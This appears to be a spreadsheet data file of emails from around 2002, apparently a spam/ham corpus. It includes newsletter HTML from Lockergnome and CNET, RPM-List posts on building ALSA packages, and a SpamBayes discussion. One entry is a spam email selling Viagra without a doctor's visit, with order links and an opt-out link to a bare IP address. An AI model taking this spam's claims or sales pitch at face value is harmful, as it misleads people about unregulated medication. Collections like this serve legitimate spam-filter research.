 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=548557/"&gt;Havas MP3 Pro&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=234527/"&gt;Magix MP3 Maker&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=278075/"&gt;Ejay MP3&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=468032/"&gt;Audiostation 5.0&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=588415/"&gt;Jack The MP3 Ripper&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=599956/"&gt;Pearson MP3 Maker&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=472433/"&gt;Steinberg My MP3&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=555517/"&gt;MusicMatch Jukebox 7.0&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=20635/"&gt;Hip Hop E-jay Record&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=393896/"&gt;MP3-Wolf&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=409500/"&gt;MP3 Maker Gold&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=273932/"&gt;The MP3 Wizard&lt;/A&gt;&lt;BR&gt;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the story of the ugly shoe unfold before our very eyes. This footwear was outcast from the group weeks ago, and has been very depressed ever since. Pity my shoe.
 &lt;p&gt;
 &lt;a href="http://images.lockergnome.com/images/video/lone.shoe.WMV"&gt;The Lone Shoe&lt;/a&gt;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Beefier Vinyl  --&gt;
 I'd feel better about doctors if it wasn't called a 'Practice.'
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Re: When are we going to get. [making ALSA rpms]
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; made. Other than that, I bet you could do non-root. The following can
 be scripted
 &gt; easily.
 &gt; 
 ...
 &gt; 2. unpack them somewhere.
 &gt; 3. for each of them, go to the top directory of the unpacked tarball,
 and do
 &gt; ../configure, then look in (I'm going by memory) TOPDIR/utils/* you
 should see a spec
 &gt; file there. Do this for the 3 tarballs and you get 3 spec files.
 &gt; 
 The above steps can all be performed "automatically",
 if the .spec files are updated to include the necessary
 macros in the %prep (%setup -q) and %build stages.
 This would make the building of the .rpm files less
 error prone and more self-contained, and it would be
 somewhat self-documenting.
 ---
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Order your Viagra and weight-loss here 6117kFvc5--9
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;New Page 1&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#808080"&gt;
 &lt;p align="center"&gt;&lt;span style="font-family: Arial; mso-fareast-font-family: Times New Roman; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;&lt;font size="5"&gt;&lt;span style="font-family: Arial; mso-fareast-font-family: Times New Roman; color: red; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;VIAGRA&lt;br&gt;
 &lt;/span&gt;&lt;span style="font-family: Arial; mso-fareast-font-family: Times New Roman; color: black; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;WITHOUT&lt;br&gt;
 A DOCTORS VISIT!!&lt;/span&gt;&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;a href="http://www.universalmeds.com/main2.php?rx=17516"&gt;&lt;font size="5"&gt;CLICK&lt;br&gt;
 HERE&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p align="center" style="text-align:center"&gt;&lt;span style="font-size:10.0pt;
 font-family:Arial"&gt;*&lt;/span&gt;&lt;span style="font-family: Arial"&gt;&lt;font size="4"&gt;Other
 Top Medications also available!!&lt;o:p&gt;
 &lt;/o:p&gt;
 &lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p align="center" style="text-align:center"&gt;&lt;span style="font-family: Arial"&gt;&lt;font size="4"&gt;*We
 have Doctors on call around the country to view&lt;br&gt;
 your information and quickly approve your order.&lt;o:p&gt;
 &lt;/o:p&gt;
 &lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p align="center" style="text-align:center"&gt;&lt;span style="font-family: Arial"&gt;&lt;font size="4"&gt;*Totally
 Discreet System allows you to order today and&lt;br&gt;
 enjoy your medication tomorrow in most cases.&lt;o:p&gt;
 &lt;/o:p&gt;
 &lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;span style="font-family: Arial; mso-fareast-font-family: Times New Roman; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;&lt;font size="4"&gt;*Finally
 you can try the wonder drug Viagra that&lt;br&gt;
 has swept the World without the embarrassment of&lt;br&gt;
 having to visit your Doctor and explain your condition!!&lt;/font&gt;&lt;/span&gt;
 &lt;p align="center"&gt;&lt;font size="5"&gt;&lt;a href="http://www.universalmeds.com/main2.php?rx=17516"&gt;TO
 ORDER CLICK HERE!&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;TO GET DELETED &lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Arial" size="2"&gt;&lt;a href="http://194.44.46.21/remove.php"&gt;http://194.44.46.21/remove.php&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 3606uLdz7-798Gxne6717WLiQ1-104VoKJ8349uvAE9-31l43
</t>
  </si>
  <si>
    <t xml:space="preserve">On 21 Jul 2002 23:59:59 +1200
 Mark Derricutt &lt;mark@talios.com&gt; wrote:
 &gt; On Mon, 2002-07-22 at 06:20, che wrote:
 &gt; 
 &gt; &gt; The server mentioned above works again now :)!
 &gt; 
 &gt; Any problems with the rpm's they provided?
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 #redhat 7.3
 rpm http://apt.sunnmore.net gnome2 73
 rpm-src http://apt.sunnmore.net gnome2 73
 #redhat 7.2
 rpm http://apt.sunnmore.net gnome2 72
 rpm-src http://apt.sunnmore.net gnome2 72
 thats the correct lines to be added to sources.list for the repository
 i just did a apt-get install gnome-session its still progressing :)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; "TP" == Tim Peters &lt;tim.one@comcast.net&gt; writes:
     &gt;&gt; Any thought to wrapping up your spam and ham test sets for
     &gt;&gt; inclusion w/ the spambayes project?
     TP&gt; I gave it all the thought it deserved &lt;wink&gt;.  It would be
     TP&gt; wonderful to get several people cranking on the same test
     TP&gt; data, and I'm all in favor of that.  OTOH, my Data/ subtree
     TP&gt; currently has more than 35,000 files slobbering over 134
     TP&gt; million bytes -- even if I had a place to put that much stuff,
     TP&gt; I'm not sure my ISP would let me email it in one msg &lt;wink&gt;.
 Check it into the spambayes project.  SF's disks are cheap &lt;wink&gt;.
 -Barry
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Hardware Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;&lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;&lt;td width=442 colspan=4&gt;
     	&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/442_computersHEAD_NWSLTR.gif" width="442" height="60" border="0" alt="CNET Computers.com Newsletter"&gt;&lt;br&gt;
         &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
         	&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
             &lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img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 shopping  --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4my9wiMiZxrhBm0WHthZR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Gateway.160x600_300c_0502.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /shopping --&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;!-- right column content --&gt;
 &lt;!-- EDITORS' CHOICE --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_EdCHOICE.gif" alt="Editors' Choice" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%25" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- hardware --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zGNpQVcu8ZvQIzTKtR1dR" &gt;Samsung ML-1430&lt;/a&gt;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAh2gJfIuNyGEI9rCM8vcR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Hardware&lt;/font&gt;
 &lt;!-- /hardware --&gt;	
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- electronics --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXmE_4HIO_7DQESNPe-iRR" &gt;Unitech 2U4U DMR-300&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6Z4KKXARjHpx8lOheMnlR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- software --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPH1eeIpAywvjsK-FdLP4R" &gt;Video Explosion Deluxe&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPzoKkNOFUywq2NRJSBTeR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Software&lt;/font&gt;
 &lt;!-- /software --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- wireless --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzT5OD3HtBzeFOPq1FsnysR" &gt;Sony Ericsson T68&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZkrudNL3XDtZs6swzdON9R" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Wireless&lt;/font&gt;
 &lt;!-- /wireless --&gt;				
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				 &lt;br&gt;
 				&lt;!-- /EDITORS' CHOICE --&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;
 	&lt;form method=get action="http://www.search.com/redirect"&gt;
 		&lt;tr valign=top&gt;&lt;td&gt;&lt;font size="-1" face="arial,helvetica,sans-serif"&gt;
 			&lt;img src="http://a.r.tv.com/cnet.1d/i/se/dispatch_hd.gif" width=150 height=20 alt="CNET Search.com" border=0&gt;&lt;br&gt;
 			&lt;img src="http://cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 			&lt;input type=text name=q size=17 value=""&gt;&lt;br&gt;
 			&lt;select name=target class=frmel&gt;
 			&lt;!-- &lt;option value="http://hardware.search.com/search?tag=ex.computers.dispatch.srch.cnet"&gt;Computers --&gt;
  				&lt;option value="http://computers.cnet.com/hardware/search/1,10121,0-1016-401-0,00.html?tag=srch&amp;qt=%%q%%&amp;cn=&amp;ca=1016"&gt;Computers
  				&lt;option value="http://cnet.search.com/search?tag=ex.computers.dispatch.srch.cnet"&gt;All CNET
  				&lt;option value="http://www.search.com/search?tag=ex.computers.dispatch.srch.web"&gt;The Web
 			&lt;/select&gt; 
 			&lt;input type=submit value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/form&gt;
 &lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;   
 	&lt;/td&gt;&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/dp/dd_c.gif"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&lt;/td&gt;&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 			&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 				&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;!-- promo section --&gt;
 		&lt;tr valign=top&gt;&lt;td width=1 bgcolor="#000000"&gt;
 			&lt;img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valign=top&gt;&lt;td width=10&gt;
 					&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td width=412&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3"&gt;&lt;br&gt;
 					&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 17, 2002&lt;/font&gt;&lt;br&gt;
 					&lt;img src="http://home.cnet.com/b.gif" width="1" height="3"&gt;&lt;br&gt;
 					&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 						&lt;tr valign=top&gt;&lt;td width=76 align=right&gt;
 							&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/66x86_TOMD.gif" width="66" height="86" border="0"&gt;&lt;br&gt;
 							&lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
 							--Tom Dunlap&lt;br&gt;
 							Senior editor&lt;br&gt;
 							CNET Hardware&lt;br&gt;&lt;/font&gt;
 							&lt;/td&gt;&lt;td width=10&gt;&lt;/td&gt;
 							&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 								&lt;font color="#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 								&lt;font size="-1"&gt;
 One of the hot trends in notebooks is squeezing desktop processors,
 not mobile CPUs, into laptops. Actually, the trend has been around
 for a while, but the bigger vendors used to pooh-pooh these
 efforts. (Intel was never too crazy about the idea, either.) Now,
 it's a bona fide movement, and the latest 9.6-pound desktop-
 replacement system from Toshiba takes this trend to new heights.
 But questions abound: Are the extra pounds worth it? Do these 
 things really get so hot that you can press pants with them? 
 Executive Editor John Morris &lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7py5L3iJCGpAEVgnfqGsJuR" &gt;sorts it out for you&lt;/a&gt;. 
 &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 					&lt;/td&gt;&lt;td width=8&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table cellpadding=0 width="100%"&gt;
   				&lt;tr&gt;&lt;td align=center&gt;
       				&lt;table width="100%" cellspacing="0" cellpadding="0" border="0"&gt;
 	    				&lt;tr&gt;&lt;td align="center" colspan="5"&gt;
 							&lt;img src="http://home.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" alt="advertisement"&gt;&lt;/td&gt;&lt;/tr&gt;
         				&lt;tr valign="middle"&gt;&lt;td colspan="5" bgcolor="#999999" height="15"&gt;
 							&lt;font face="verdana,geneva,helvetica" size="-2" color="#ffffff"&gt;&lt;b&gt;click  here for details&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 						&lt;tr valign="middle" align="center" bgcolor="#eeeeee"&gt;
 		  					&lt;td height="35"&gt; &lt;/td&gt;
 		  					&lt;FORM action=http://computers.cnet.com/cgi-acc/clickthru.acc method=get target=_top&gt;
 		  					&lt;td width="50%" align="center"&gt;
 		  						&lt;INPUT name=url type=hidden value=http://home.cnet.com/go/to?tag=dd.co.wht.aislebut.dktp-dell&amp;destUrl=http%3a%2f%2fhome.cnet.com%2fhardware%2fsearch%2fresults%2f1,11277,0-1017-403-0,00.html%3fqt%3ddell%2bhome&gt;
 		  						&lt;INPUT type=submit value="     Dell     "&gt;&lt;/td&gt;&lt;/form&gt;
 		  						&lt;FORM action=http://computers.cnet.com/cgi-acc/clickthru.acc method=get target=_top&gt;
 		  					&lt;td width="50%" align="center"&gt;
 		  						&lt;INPUT name=url type=hidden value=http://home.cnet.com/go/to?tag=dd.co.wht.aislebut.dktp-gateway&amp;destUrl=http%3a%2f%2fhome.cnet.com%2fhardware%2fsearch%2fresults%2f1,11277,0-1017-403-0,00.html%3fqt%3dgateway&gt; 
 		  						&lt;INPUT type=submit value=" Gateway "&gt;&lt;/td&gt;&lt;/form&gt;
 							&lt;td&gt;&lt;/td&gt;
 						&lt;/tr&gt;
 	  				&lt;/table&gt;    
 					&lt;/td&gt;
   				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;br&gt;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href="http://clickthru.online.com/Click?q=d2-THo_QULw1KYQAew3Gl22vbAOyesR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/050202chipart.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXoN8JRKwVqS8CMB0qvsZR" &gt;&lt;b&gt;Intel's new insides&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;The i845 chipset's many flavors are faster, better, and a lot more confusing. Read before you shop.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1rZJyeaO_Iti64Q9t8uR" &gt;Gateway 300 series keeps PCs simple
 &lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYryNcDy-pEvKY-qkCKsR" &gt;Modernize your motherboard&lt;/a&gt;&lt;br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popular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;Desktops&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2G9eJMZsSkMRUVolYrBZR" &gt;Gateway 700XL&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIs1bVpNELY0VXXjhrHNHdR" &gt;Dell Dimension 4000 series&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxz__HG3Jlh9GpMUHM3rR" &gt;HP Pavilion 950&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIA9TfGqksPj9y-DzbW-iR" &gt;Alienware Aurora DDR&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIw9gkoTgbDr4q1O7VpJlR" &gt;Falcon Northwest Mach V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdqUjw6eLVb8HYULuonX9R" &gt;See all most popular desktops&lt;/a&gt;&lt;/b&gt;&lt;br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
 &lt;!-- /Leads Module --&gt;
 			&lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;
 				&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 					&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/wr/sub_rev.gif" alt="Reviews" width="125" height="19" border="0"&gt;&lt;br&gt;
 					&lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- item 1 --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTaQ0HQGksIC1b2OB8OEuR" &gt;Are bigger notebooks better?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The latest desktop-replacement notebook from Toshiba takes the
 desktop-chip trend to new heights. But Toshiba's not alone. Keep
 up with the latest in Executive Editor John Morris's Digital
 Domain column. 
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZB7wY6FZCRaT-Dc13yE_FR" &gt;Read the column&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;!-- item 2 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWF8zzz901I7c7YuNDxuyC9R" &gt;Desktop chip turbocharges WinBook J4&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 WinBook's big and heavy J4 uses a desktop Pentium 4 and leaves
 mobile P4-M notebooks in the dust. (It's a trend; see item No. 1.)
 Click here for the full review of this speedy new WinBook.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyw2tG_OC5jnbcumX6cvbuR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO2iIMpUqFtvDA4oSMpoLsR" &gt;&lt;b&gt;Configure &amp;amp; price&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;!-- center1 --&gt;
 &lt;!-- /center1 --&gt;
 &lt;!-- item 3 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjk58ZIDgrsUb9HGRJ1bfZR" &gt;Apple eMac not just for education anymore&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Ideally suited to students living in small spaces and home users
 with basic needs, the eMac is an attractive, adequately speedy,
 and easy-to-use PC without the flat-panel iMac's relatively high
 price. Wondering whether to go CRT or flat-panel? Read our review.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=24-8DdMIcz6Cx7CRIwgeUef92iqrwdR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6kxhAFUfCGLs-y39w-_cR" &gt;&lt;b&gt;Configure &amp;amp; price&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- item 4 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZAScVxi6pIKlsTn8N_JjiR" &gt;Acer TravelMate 632XCi: P4 to the people&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Acer's new TravelMate delivers just what you'd expect from a
 mainstream notebook. It's not the fastest mobile Pentium 4-M
 notebook we've tested, but it offers a solid set of features and
 long battery life in an attractive, relatively low-cost package.
 Find out more here.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSg0_Qyf6g_9-hwkp_WElR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBf9LNNXiWmFz_e0CvgparR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- item 5 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KT6XMy6PDuYWD0V_WyRR" &gt;Faster RAM boosts Atlas Micro GS 9800&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Thank Sis Technology (not foot-dragging Intel) for the 645DX
 chipset that lets the GS 9800 pair 333MHz DDR SDRAM with a Pentium 4
 processor--a combination that ekes out a bit more performance for
 the price. For more on this affordable system for gamers and
 enthusiasts, read our review.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1qYOxGr1fQffN5r5ls4FR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
